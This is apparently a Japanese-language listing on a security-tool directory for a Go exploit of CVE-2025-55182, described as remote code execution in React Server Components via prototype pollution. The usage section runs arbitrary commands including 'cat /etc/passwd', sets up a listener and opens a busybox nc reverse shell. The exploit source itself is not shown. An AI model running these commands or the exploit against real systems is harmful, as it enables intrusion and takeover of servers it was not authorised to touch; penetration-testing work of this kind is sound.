Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/w3nch/cve-2025-55182-in-go
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubw3nch/cve-2025-55182-in-go

CVE-2025-55182-in-go

GoベースのCVE-2025-55182向けエクスプロイト。プロトタイプ汚染を介してReact Server Componentsでリモートコード実行を実現します。任意のコマンド実行とリバースシェルペイロードをサポートします。

リポジトリを見る
44ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 — React Server Components RCE

プロトタイプ汚染を利用した React Server Components の RCE エクスプロイトです。

使用方法

go run main.go -t <target> -c <command>

使用例

go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"

リバースシェル

リバースシェルをセットアップ

penelope -i 0.0.0.0 -p 1337

busybox を使用:

go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"

ビルド

go build -o exploit .

注意事項

  • スキームが欠落している場合は HTTPS が自動的に追加されます
  • コマンド出力はレスポンス内で base64 エンコードされます
  • リダイレクトは意図的に無効化されています
ツールをダウンロード